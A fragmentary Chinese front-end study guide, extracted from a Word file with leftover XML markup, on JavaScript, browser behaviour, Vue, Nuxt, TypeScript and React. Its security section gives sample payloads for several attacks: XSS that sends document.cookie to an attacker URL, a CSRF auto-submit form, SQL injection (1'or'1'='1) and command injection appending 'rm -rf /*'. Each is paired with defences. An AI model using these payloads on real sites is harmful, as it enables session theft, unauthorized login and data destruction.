          <w:numId w:val="25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多个setState合并成一个更新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5.基本组件写法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.{Component}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./app.css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logo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./logo.svg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App extends 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formatname(user){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Const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Const jsx = &lt;p&gt;hello&lt;/p&gt;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{/*注释写法*/}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&lt;h1&gt;{name}&lt;/h1&gt;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&lt;h1&gt;{ this.formatname() }&lt;/h1&gt;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&lt;img src={logo} style={{width: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100px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}} /&gt;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{jsx}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{}里面四个表达式就行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 有两种类型的组件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function welcome1(props){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&lt;div&gt;webcome1,{props.name}&lt;/div&gt;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class webcome2 extend React.Component{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&lt;div&gt;welcome2,{this.props.name}&lt;/div&gt;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注意：react里面没有双向绑定的，只有单向数据流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state例子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React，{Component}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Clock extends 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State={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Date:new Date()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componentDidMount(){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This.timer =setInterval(()=&gt;{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This.setState({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Date:new Date()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componentWillUnmont(){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clearInterval(this.timer)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{this.state.date.toString()}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//批量执行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This.setDate({count:this.state.count+1})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三次执行会合并成一个，只执行了一次，结果是2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正确的写法是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条件语句和循环语句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CartSample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状态初始化一般放在构造器中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super(props);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//固定写法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this.state =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//里面在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constructor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需要加thsi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goods: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id: 1, text: "web全栈架构师"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id: 2, text: "python全栈架构师"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Text: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This.addGood = this.addGood.bind(this)//绑定作用域的第二种方法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addToCart = good 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newCart = [...this.state.cart]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idx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textChange =(e)=&gt;{//不用箭头函数会出现this的指向问题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This.setState({ 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Text:e.target.value</w:t>
      </w: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(&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="1260" w:firstLineChars="6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{/* 条件渲染 */}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{this.props.title &amp;&amp; &lt;h1&gt;{this.props.title}&lt;/h1&gt;}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{/* 列表渲染 */}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{this.state.goods.map(good =&gt; (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&lt;li key={good.id}&gt;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{good.text}&lt;/li&gt;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//写多一个参数传参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&lt;button onClick={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()=&gt;{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This.addToCart(good)</w:t>
      </w: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1890" w:firstLineChars="9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1890" w:firstLineChars="9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}&gt;&lt;/button&gt;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))}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{/* 事件绑定 */}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&lt;input type=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value ={this.state.text} onChange={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This.textChage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/&gt;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生命周期函数：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Lifecycle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super(props);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常用于初始化状态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console.log("1.组件构造函数执行");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此时可以访问状态和属性，可进行api调用等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console.log("2.组件将要挂载");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componentDidMount()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组件已挂载，可进行状态更新操作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console.log("3.组件已挂载");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componentWillReceiveProps()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//第一次组件渲染不会执行，要第二次prop变化才触发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父组件传递的属性有变化，做相应响应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console.log("4.将要接收属性传递");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shouldComponentUpdate()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组件是否需要更新，需要返回布尔值结果，优化点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console.log("5.组件是否需要更新？");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true;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componentWillUpdate()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组件将要更新，可做更新统计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console.log("6.组件将要更新");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componentDidUpdate()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console.log("7.组件已更新");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componentWillUnmount()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组件将要卸载, 可做清理工作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console.log("8.组件将要卸载");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console.log("组件渲染");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&lt;div&gt;生命周期探究&lt;/div&gt;;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触发render更新的方法是setState 变化和props的变化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16.4以后的版本加will的钩子都删掉了,因为引进了异步渲染机制，以前的will钩子会被多次执行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取而代之是getDerivedStateFromProps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3301365"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="5" name="图片 5" descr="15826723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267236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配置按需加载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安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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react-app-rewired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取代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react-scripts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，可以扩展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webpack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的配置 ，类似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vue.confifig.js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npm install react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app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rewired@2.0.2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next.0 babel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plugin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save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在跟目录加文件：config-overrides.js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injectBabelPlugin } = require("react-app-rewired");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function override(config, env)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在默认配置基础上注入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插件名，插件配置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["import", { libraryName: "antd", libraryDirectory: "es", style: "css"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["@babel/plugin-proposal-decorators", { legacy: true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config;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Packjson.js修改启动配置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"scripts":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"start": "react-app-rewired start",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"build": "react-app-rewired build",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"test": "react-app-rewired test",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"eject": "react-app-rewired eject"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导入需要的组件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'react'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import Button from 'antd/lib/button'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import 'antd/dist/antd.css'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{Button} from 'antd'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AntdTest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&lt;Button type="primary"&gt;按钮&lt;/Button&gt;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React的组件设计思路是状态的组件在父亲组件，展示的组件维护在函数子组件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 在数据没有变化的情况下同过shouldComponentUpdata来判断是否需要更新，达到优化目的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shouldCpmponentUpdate(nextProps){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If(nextProps.data.body===this.props.data.body){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false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true;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也可以用PureComponent,这个是一个shouldCpmponentUpdate的浅比较,不要在调用的时候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传对象，这样不会更新，应该在调用的时候用对象展开的方式：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&lt;Comment key={i} {...data}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Comment extends React.PureComponent{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高阶组件:就是一个函数，输入一个组件，加强功能后，放回一个新的组件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Comment =  Reat.meno(function(props)){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&lt;div&gt;&lt;/div&gt;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这种形式就拥有了PureComponent 的能力了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高阶组件的例子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原生组件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Kaikeba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{this.props.stage}-{this.props.name}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//经过修饰的高阶组件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withkaikeba = comp=&gt;{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props =&gt;{ &lt;comp {...props} name={name}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//调用高阶组件，放回新的组件实例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newComp = withkaikeba(kaikeba);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//使用实例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Hoc extends Component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newComp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stage="React" /&gt;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react装饰器：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Config-overrides.js下面添加这个插件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["@babel/plugin-proposal-decorators", { legacy: true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const NewKaikeba = withLog(withKaikeba(withLog(Kaikeba)));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@withLog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@withKaikeba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@withLog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Kaikeba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{this.props.stage}-{this.props.name}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Hoc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&lt;Kaikeba stage="React"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顺序上从上到下的，一层层的调用，装饰器只能修饰class，函数是不行的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react的slot：props.children 就是包含在组件中的代码，相当与vue中的匿名代码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Props.footer 相当与具名插槽：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Dialog(props)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style={{ border: `4px solid ${props.color || "blue"}` }}&gt;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{props.children}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className="footer"&gt;{props.footer}&lt;/div&gt;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WelcomeDialog通过复合提供内容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WelcomeDialog(props)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&lt;Dialog {...props}&gt;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&lt;h1&gt;欢迎光临&lt;/h1&gt;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&lt;p&gt;感谢使用react&lt;/p&gt;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&lt;/Dialog&gt;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footer = &lt;button onClick={() =&gt; alert("确定！")}&gt;确定&lt;/button&gt;;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&lt;WelcomeDialog color="green" footer={footer} /&gt;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props.children 其实是个表达式，取决于组件包裹的内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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可以用于函数调用：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Api =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getUser()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 name: "jerry", age: 20 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Fetcher(props)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user = Api[props.name]();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props.children(user);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&lt;Fetcher name="getUser"&gt;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{({ name, age }) =&gt; (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{name}-{age}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&lt;/p&gt;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&lt;/Fetcher&gt;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可以用于过滤标签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Filter({ children, type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{React.Children.map(children, child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(child.type !== type)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child;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&lt;Filter type="p"&gt;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&lt;h1&gt;react&lt;/h1&gt;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&lt;p&gt;react很不错&lt;/p&gt;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&lt;h1&gt;vue&lt;/h1&gt;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&lt;p&gt;vue很不错&lt;/p&gt;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&lt;/Filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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可以修改组件属性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RadioGroup(props)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{React.Children.map(props.children, child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  vdom不可更改，克隆一个新的去改才行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React.cloneElement(child, { name: props.name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//解构出children，其他属性放到rest变量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Radio({children, ...rest})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&lt;label&gt;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&lt;input type="radio" {...rest}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{children}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&lt;/label&gt;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&lt;RadioGroup name="mvvm"&gt;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value="vue"&gt;vue&lt;/Radio&gt;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value="react"&gt;react&lt;/Radio&gt;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value="angular"&gt;angular&lt;/Radio&gt;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&lt;/RadioGroup&gt;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Hook  表示原来的函数形式的组件也可以用状态了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React,{useState,useEffect}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HookTest(){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//0代表count的初始值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[count,setCount] = useState(0)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多个的情况下：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[age] = useState(20)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[fruit,setFruit] =useState(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banana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[fruits,setFruits] =useState([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banana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&lt;p&gt;点击了&lt;/p&gt;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 ={ ()=&gt;{setCount(count+1)}}&gt;点击&lt;/button&gt;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effect hook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 useState,usrEffect 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Document.title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你点击${count}次了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这个钩子相当于合并了componnetDidMount,componentUpdate,componentWillUnmount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//只调用一次的情况下这样配置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//api调用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},[])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//count变化了才会执行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//api调用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},[count])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自定义钩子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自定义hook是一个函数，名称用“use"开头，函数内部可以调用其他钩子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//可以用于api请求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useAge(){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[age,setAge] =useState(0)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useEffect(()=&gt;{ //相当于componentDitMount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setTimeout(()=&gt;{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setAge(20)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},2000)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age;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HookTest()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//调用钩子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age = useAge();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&lt;p&gt;年龄：{age ? age : 'loading...'}&lt;/p&gt;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react跨组件传递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React,{useContext}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Mycontent = React.createContext();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{Provider,Consumer} = MyContext;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child(prop){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&lt;div&gt;child:{prop.foo}&lt;/div&gt;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child2(){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Const ctx = useContext(MyContext);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&lt;div&gt;child2:{ctx.foo}&lt;/div&gt;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child3 extends React.component{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 contectType = myContent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&lt;div&gt;child3:{this.context.foo}&lt;/div&gt;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ContentTest(){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 value={{foo:bar}}&gt;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&lt;Consumer&gt;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{value=&gt;&lt;child {...value}&gt;&lt;/child&gt;}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&lt;/Consumer&gt;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&lt;child2 &gt;&lt;/child&gt;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&lt;child3 &gt;&lt;/child&gt;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组件设计与实现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参见代码</w:t>
      </w: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安装npm i redux -S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Redux中只有同步的概念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通过dispatch(action) 触发action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新建文件store.js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‘react’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{createStore}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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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state+1;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Case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state-1;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Default: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createStore(counterReducer)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//引用的组件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ReduxTest(){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&lt;div&gt;{store.getState()}&lt;/div&gt;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onClick={()=&gt;store.dispath({type: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})}&gt;&lt;/button&gt;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onClick={()=&gt;store.dispath({type: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})}&gt;&lt;/button&gt;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"./store";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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"));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//调用dispacth之后，点阅改变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store.subscribe(() =&gt;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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"))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react-redux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安装：npm install react-redux --save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//Store.js文件：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‘react’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{createStore}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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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state+1;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Case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state-1;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Default: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createStore(counterReducer)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Index.js文件：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{Provider}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 store={store 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&lt;ReduxTest&gt;&lt;/ReDuxTest&gt;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&lt;/Provider&gt;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//ReduxTest代码：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mapStateToProps = state =&gt; ({ num: state.counter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mapDispatchToProps = { add, minus};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function ReduxTest({ num, add, minus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&lt;p&gt;{num}&lt;/p&gt;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&lt;button onClick={minus}&gt;-&lt;/button&gt;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&lt;button onClick={add}&gt;+&lt;/button&gt;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export default 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mapStateToProps,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mapDispatchToProps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)(ReduxTest);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react-thunk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1.安装：npm install redux-thunk -save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在触发action的到达store之前时候事实上可以经过多个中间键的，比如log，thunk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主要目录结构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///Store.js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createStore, applyMiddleware, combineReducers } from "redux";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logger from "redux-logger";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thunk from "redux-thunk";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counterReducer } from "./count.redux";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combineReducers({ counter: counterReducer}),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applyMiddleware(logger, thunk)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count.redux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counterReducer = (state = 0, action)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 (action.type)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"add":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 + 1;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"minus":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 - 1;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default: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add = () =&gt; ({ type: "add"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minus = () =&gt; ({ type: "minus"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asyncAdd = () =&gt; dispatch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做异步操作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setTimeout(()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dispatch({ type: "add"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 1500);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//主页面引用store.js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Provider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"./store";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&lt;Provider store={store}&gt;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&lt;ReduxTest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&lt;/Provider&gt;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//组件用法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add, minus, asyncAdd } from "../store/count.redux"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//引用方法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mapStateToProps = state =&gt; ({ num: state.counter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mapDispatchToProps = { add, minus, asyncAdd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mapStateToProps,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mapDispatchToProps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ReduxTest extends React.Component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{ num, minus, add, asyncAdd } = this.props;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&lt;p&gt;{num}&lt;/p&gt;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onClick={minus}&gt;-&lt;/button&gt;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onClick={add}&gt;+&lt;/button&gt;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onClick={asyncAdd}&gt;AsyncAdd&lt;/button&gt;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ReduxTest;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react-rounter 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安装：npm install react-router-dom -s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基本用法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//新建文件：user.redux.js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initial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isLogin: false,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loading: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user = (state = initial, action)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 (action.type)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"requestLogin":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isLogin: false,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loading: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"login":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isLogin: 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default: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action creator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login = () =&gt; dispatch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dispatch({ type: "requestLogin"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做异步操作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setTimeout(()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dispatch({ type: "login"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 2000);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//RouteSample.js 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"../store/user.redux";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 BrowserRouter,Link,Route，Switch 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react-router-dom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home(params){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&lt;ul&gt;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&lt;Link to="/detail/web"&gt;Web架构师&lt;/Link&gt;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&lt;Link to="/detail/python"&gt;Python架构师&lt;/Link&gt;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About(params){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//路由嵌套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的时候显示这个组件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//路由为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/about/**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的时候显示下面的组件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//Switch 为没有匹配到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/about/**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的时候显示/about/me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&lt;h3&gt;个人中心&lt;/h3&gt;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&lt;Link to="/about/me"&gt;个人信息&lt;/Link&gt;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&lt;Link to="/about/order"&gt;订单查询&lt;/Link&gt;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&lt;Switch&gt;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&lt;Route path="/about/me" component={() =&gt; &lt;div&gt;Me&lt;/div&gt;}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&lt;Route path="/about/order" component={() =&gt; &lt;div&gt;order&lt;/div&gt;}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&lt;Redirect to="/about/me"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&lt;/Switch&gt;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传递进来路由器对象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Detail(props)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1.history: 导航指令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2.match: 获取参数信息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3.location: 当前url信息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console.log(props);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当前课程：{props.match.params.course}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onClick={props.history.goBack}&gt;后退&lt;/button&gt;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NoMatch({ location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&lt;div&gt;404, {location.pathname}不存在&lt;/div&gt;;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登录组件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Login = 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isLogin: state.user.isLogin,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loading: state.user.loading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 login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)(function({ location, isLogin, login, loading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redirect = location.state.redirect || "/";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(isLogin)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&lt;Redirect to={redirect} /&gt;;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&lt;p&gt;用户登录&lt;/p&gt;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&lt;hr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onClick={login} disabled={loading}&gt;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{loading ? "登录中..." : "登录"}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&lt;/button&gt;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路由守卫 希望用法：&lt;PrivateRoute component={About} path="/about" ...&gt;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PrivateRoute = connect(state =&gt; ({ isLogin: state.user.isLogin }))(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({ component: Comp, isLogin, ...rest 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做认证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render:根据条件动态渲染组件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&lt;Route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{...rest}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render={props =&gt;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isLogin ?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&lt;Comp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 :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&lt;Redirect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to={{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pathname: "/login",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state: { redirect: props.location.pathname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}}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RouteSamle(){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&lt;BrowserRouter&gt;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&lt;div&gt;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&gt;首页&lt;/link&gt;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&gt;首页&lt;/link&gt;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//exact 是路由完成匹配的意思 家这个后/about 就不会显示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//Switch 的意思了只选择一个，如果都不匹配就匹配404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&lt;Switch&gt;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 exact path="/" component={() =&gt; home}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//路由守卫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&lt;PrivateRoute path="/about" component={About}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 path="/detail:course" component={() =&gt; home}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&lt;Route path="/login" component={Login}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{/* 404：没有path，必然匹配 */}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&lt;Route component={NoMatch}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&lt;/Switch&gt;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&lt;/BrowserRouter&gt;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 原理：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currentState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{}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//state其实就是一个对象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currentListeners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//通过发布订阅更新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//调用方法直接返回state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currentState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listener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//订阅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currentListeners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push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listener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//发布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currentState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action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//调用传入的reducer函数，传入currentState，和action 更新函数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currentListeners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forEach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v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v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//执行订阅函数更新，执行render更新重新读取state显示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action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({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type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>'@IMOOC/WONIU-REDUX'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//中间件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applyMiddleware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middlewares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reducer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enhancer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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 就是下面的return函数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store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createStore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let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dispatch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dispatch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//抽取store里面的state和方法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midApi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//执行中间件列表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middlewareChain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middleware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midApi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dispatch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compose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middlewareChain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dispatch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//这个函数的作用是把函数连式串联，上一个的返回值作为参数传入下一个参数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function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compose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arg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if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length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==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[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funcs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reduce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ret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ret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item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//React-redux 原理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React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'react'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PropTypes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'prop-types'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bindActionCreators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from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</w:rPr>
        <w:t xml:space="preserve">'./woniu-redux'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export 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connect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mapStateToProps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,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mapDispatchToProps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{})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WrapComponent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class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ConnectComponent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extends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React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Component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static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contextTypes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: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PropTypes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object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constructor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context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super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context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state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:{}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componentDidMount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//绑定事件，当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里面的方法触发了dispatch函数，就会更新state，和调用下面的//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eastAsia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，进而调用update函数，把store上面属性和dispatch方法，放到props里面，pros变化了就触发//组件的更新了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subscribe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(()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>=&gt;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update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 xml:space="preserve">context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stateProps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mapStateToProps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getState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const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7"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">dispatchProps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console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bindActionCreators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mapDispatchToProps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store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dispatch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setState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:{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>stateProps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0055AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">dispatchProps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render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&lt;WrapComponent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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="770088"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>this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state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</w:rPr>
        <w:t>props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&gt;&lt;/WrapComponent&gt;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与redux-thunk不同点：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 踩用generator 对异步的控制性更加强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redux-sage 不会派发函数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redux-thunk 有其实有点破环redux的原则，因为redux派发的一般是对象，redux-thunk有可能派发函数。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安装：npm install --save redux-saga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Sages.js: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//call是调用异步函数的，put是通知更新的，takeEvent复制全局监听action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call, put, takeEvery } from "redux-saga/effects";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模拟登录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UserService =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login(uname)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return new Promise((resolve, reject)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setTimeout(()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if (uname === "Jerry")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  resolve({ id: 1, name: "Jerry", age: 20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} else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  reject("用户名或密码错误");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}, 1000);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login(action)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try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"requestLogin"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const result = yield call(UserService.login, action.uname);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"loginSuccess", result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 catch (message)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yield put({ type: "loginFailure", message });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mySaga()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takeEvery("login", login);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default mySaga;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/user.redu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const user = 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state = { isLogin: false, loading: false, error: "" },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action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 =&gt;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switch (action.type)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"requestLogin":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false, loading: true, error: ""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"loginSuccess":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true, loading: false, error: ""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case "loginFailure":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{ isLogin: false, loading: false, error: action.message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default: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    return state;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function login(uname)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return { type: "login", uname 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//store/indexjs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createStore, applyMiddleware, combineReducers } from "redux";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logger from "redux-logger";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thunk from "redux-thunk";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counterReducer } from "./count.redux";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user } from "./user.redux";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createSagaMiddleware from "redux-saga";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mySaga from "./sagas";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1.创建saga中间件并注册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sagaMiddleware = createSagaMiddleware();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const store = createStore(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combineReducers({ user }),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applyMiddleware(logger, sagaMiddleware)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// 2.中间件运行saga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sagaMiddleware.run(mySaga);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export default store;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调用：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import { login } from "../store/user.redux";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组件调用onclick ={login},这个时候saga会拦截action提交，先执行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function* mySaga()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takeEvery("login", login);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函数,执行完逻辑在往下面走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ind w:left="0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Generator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Function *g(){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  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a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b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Yield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c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‘</w:t>
      </w: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ending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170" w:firstLineChars="1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Var gen = g();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"a", done: false}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"b", done: false}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"c", done: false}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console.log(gen.next()); // {value: "ending", done: true}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注意:yeild后面跟promise 的话就可以等待promise完成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事实上saga在内部通过这个函数执行逻辑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next()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{ value, done } = gen.next();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console.log(value); // 依次打印输出 a b c end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(!done) next(); // 直到全部完成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看下面的例子：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function* say()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a = yield "1";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console.log(a);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b = yield "2";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console.log(b);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it = say("bar"); // 返回迭代器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 { value: '1', done: false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a的值并非该返回值，而是下次next参数,就是“我是被传进来的1”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输出'我是被传进来的1'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输出{ value: '2', done: false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console.log(it.next("我是被传进来的1"));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输出'我是被传进来的2'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输出{ value: undefined, done: true } //如果yield下面还有代码，但是，没有return，放回值是undefined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console.log(it.next("我是被传进来的2"));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4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基于ant的后台管理系统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"https://preview.pro.loacg.com/dashboard/workplace"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https://preview.pro.loacg.com/dashboard/workplace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基于vue的后台管理系统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"https://panjiachen.github.io/vue-element-admin/" \l "/documentation/index"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https://panjiachen.github.io/vue-element-admin/#/documentation/index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4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umi项目开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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在config/config下面配置如下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plugins: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"umi-plugin-react",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antd: true,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dva: true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routes: [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//login单独一页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path: "/login", component: "./login"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 "/",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 "../layouts",//所有内容页面的父页面，放置布局内容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routes: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{ path: "/", component: "./index"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path: "/", component: "./goods/index"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path: "/about",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"./about",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Routes: ["./routes/PrivateRoute.js"]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path: "/users",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"./users/_layout",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routes: [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 path: "/users/", component: "./users/index" },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 path: "/users/:id", component: "./users/$id"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ind w:firstLine="630" w:firstLineChars="30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//404单独一页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"./404"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Layout里面一般放置头部信息，导航信息，内容页面，底部信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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过滤路由：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menus =[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商品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用户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关于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selectedKeys = menus.filter(menu=&gt;{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If(menu.path===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pathname===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//根目录独立放回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pathname.start.Width(menu.path)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}).map(menu=&gt;menu.path)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9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配置404页面：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routes: [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"./404"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widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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js: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用exception 组件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{Exception} from 'ant-design-pro'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&lt;Exception type="404" backText="返回首页"&gt;&lt;/Exception&gt;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login.js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routes: [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component: "./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styles from "./login.css";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"ant-design-pro";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//用pro的集成login组件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"dva";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UserName, Password, Submit } = Login;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onSubmit = (err, values)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console.log("用户输入：", values);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校验通过，提交登录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this.props.dispatch({ type: "user/login", payload: values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className={styles.loginForm}&gt;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logo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&lt;img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className={styles.logo}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src="https://img.kaikeba.com/logo-new.png"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登录表单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&lt;Login onSubmit={this.onSubmit}&gt;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&lt;UserName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name="username"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placeholder="kaikeba"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"请输入用户名"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name="password"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placeholder="123"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"请输入密码"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&lt;Submit&gt;登录&lt;/Submit&gt;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&lt;/Login&gt;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接口模拟：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在mock文件夹中新建login.js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"post /api/login"(req, res, next)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{ username, password } = req.body;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console.log(username, password);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(username == "kaikeba" &amp;&amp; password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res.json({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code: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token: "kaikebaisgood",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role: "admin",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balance: 1000,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"kaikeba"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(username == "jerry" &amp;&amp; password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res.json({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code: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token: "kaikebaisgood",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role: "user",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balance: 100,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"jerry"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res.status(401).json({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code: -1,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msg: "密码错误"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取接口数据：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Src下面新建model文件夹，新建文件user.js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"axios";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"umi/router";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userinfo = JSON.parse(localStorage.getItem("userinfo")) ||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token: "",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role: "",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username: "",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balance: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api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login(payload)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axios.post("/api/login", payload);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namespace: "user", // 可省略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userinfo, // 初始状态：缓存或空对象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effects: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action: user/login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*login({ payload }, { call, put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data: { code, data: userinfo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= yield call(login, payload);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(code == 0)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登录成功: 缓存用户信息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localStorage.setItem("userinfo", JSON.stringify(userinfo));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yield put({ type: "init", payload: userinfo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router.push("/");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登录失败：弹出提示信息，可以通过响应拦截器实现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catch (error)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reducers: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init(state, action)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覆盖旧状态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action.payload;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Login.js:调用onSubmit 派发事件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styles from "./login.css";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"ant-design-pro";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"dva";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UserName, Password, Submit } = Login;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onSubmit = (err, values)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console.log("用户输入：", values);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(!err)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校验通过，提交登录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this.props.dispatch({ type: "user/login", payload: values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className={styles.loginForm}&gt;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logo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&lt;img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className={styles.logo}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src="https://img.kaikeba.com/logo-new.png"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{/* 登录表单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&lt;Login onSubmit={this.onSubmit}&gt;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&lt;UserName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name="username"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placeholder="kaikeba"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"请输入用户名"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name="password"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placeholder="123"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rules={[{ required: true, message: "请输入密码" }]}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&lt;Submit&gt;登录&lt;/Submit&gt;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&lt;/Login&gt;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9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接口响应拦截：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在src下面新建固定名字的global.js，这个文件的代码会被自动执行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interceptor from './interceptor'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"axios";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notification } from "antd";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codeMessage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202: "一个请求已经进入后台排队（异步任务）。",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401: "用户没有权限（令牌、用户名、密码错误）。",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404: "发出的请求针对的是不存在的记录，服务器没有进行操作。",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500: "服务器发生错误，请检查服务器。"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仅拦截异常状态响应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axios.interceptors.response.use(null, ({ response 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(codeMessage[response.status])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notification.error({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message: `请求错误 ${response.status}: ${response.config.url}`,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description: codeMessage[response.status]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Promise.reject(err); //不影响其他地方的错误处理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model作用域文件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2638425" cy="10287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这样的话这个model只有作用在goods模块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新建goods.js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axios from "axios";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api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getGoods()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axios.get("/api/goods").then(({ data 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courses: data.courseData.data,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tags: data.courseData.tags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namespace: "goods",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courses: {},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tags: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effects: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*getList(action, { call, put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const payload = yield call(getGoods);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yield put({ type: "initGoods", payload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reducers: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initGoods(state, { payload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payload;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Goods/index.js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Card, Row, Col, Skeleton, Icon } from "antd";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connect } from "dva";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TagSelect } from "ant-design-pro";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@connect(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state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courses: state.goods.courses,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tags: state.goods.tags,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loading: state.loading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getList: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type: "goods/getList"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addCart: payload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type: "cart/addCart",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payload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Goods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super(props);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displayCourses为需要显示的商品数组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this.state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displayCourses: new Array(8).fill({}) // 填充数组用于骨架屏展示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componentDidMount()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this.props.getList({ foo: "bar"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componentWillReceiveProps(props)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(props.tags.length)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this.tagSelectChange(props.tags, props.courses);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// 页签变更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tagSelectChange = (tags, courses = this.props.courses)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console.log(tags);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['js','react']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[[{}],[{}]]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[{},{}]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const displayCourses = tags.flatMap(tag =&gt; courses[tag]);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console.log(displayCourses);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this.setState({ displayCourses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addCart = (e, item)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e.stopPropagation();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this.props.addCart(item);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console.log(this.props.loading);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(this.props.loading.models.goods)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&lt;div&gt;加载中...&lt;/div&gt;;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{/* 分类标签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&lt;TagSelect onChange={this.tagSelectChange}&gt;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{this.props.tags.map(tag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&lt;TagSelect.Option key={tag} value={tag}&gt;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{tag}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&lt;/TagSelect.Option&gt;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&lt;/TagSelect&gt;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{/* 商品列表 */}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&lt;Row type="flex" justify="start"&gt;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{this.state.displayCourses.map((item, index)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&lt;Col key={index} style={{ padding: 10 }} span={6}&gt;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{item.name ?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&lt;Card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hoverable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title={item.name}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cover={&lt;img src={"/course/" + item.img} /&gt;}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extra={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&lt;Icon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onClick={e =&gt; this.addCart(e, item)}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type="shopping-cart"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style={{ fontSize: 18 }}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&lt;Card.Meta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description={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&lt;span&gt;￥{item.price}&lt;/span&gt;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&lt;span style={{ float: "right" }}&gt;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&lt;Icon type="user" /&gt; {item.solded}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&lt;/span&gt;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&lt;div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&lt;/Card&gt;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) : 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&lt;Skeleton active={true}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&lt;/Col&gt;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&lt;/Row&gt;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Goods;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Rect和vue中选型？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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看看手上的开发人员都熟悉那个，选择多数人熟悉的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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项目是否要快速用开发vue比较合适，大型项目需要typescript支持好的react支持好一点灵活一点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setState原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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把state对象通过addState方法添加进pendingStates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addState(nextState)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(nextState)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this.pendingStates.push(nextState)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(!this.isPending) {//如果不是在更新，就立即去更新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this.emitUpdate()//2触发更新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触发更新函数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emitUpdate(nextProps, nextContext)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this.nextProps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this.nextContext = nextContext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receive nextProps!! should update immediately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//3,如果没有在更新就执行updateComponent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nextProps || !updateQueue.isPending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? this.updateComponent()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 updateQueue.add(this)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getState 合并所有的state的数据，一次更新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updateComponent()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{ instance, pendingStates, nextProps, nextContext } = this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(nextProps || pendingStates.length &gt; 0)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nextProps = nextProps || instance.props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nextContext = nextContext || instance.context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this.nextProps = this.nextContext = null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4 getState 合并所有的state的数据，一次更新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shouldUpdate(instance, nextProps, this.getState(), nextContext, this.clearCallbacks)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执行是否更新钩子：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shouldUpdate(component, nextProps, nextState, nextContext, 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是否应该更新 判断shouldComponentUpdate生命周期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shouldComponentUpdate =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(component.shouldComponentUpdate)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shouldComponentUpdate = component.shouldComponentUpdate(nextProps, nextState, nextContext)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(shouldComponentUpdate === false)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component.state = nextState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component.context = nextContext ||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cache = component.$cache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cache.state = nextState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cache.context = nextContext ||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//强制更新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component.forceUpdate(callback)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强制更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>forceUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,最重要的方法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
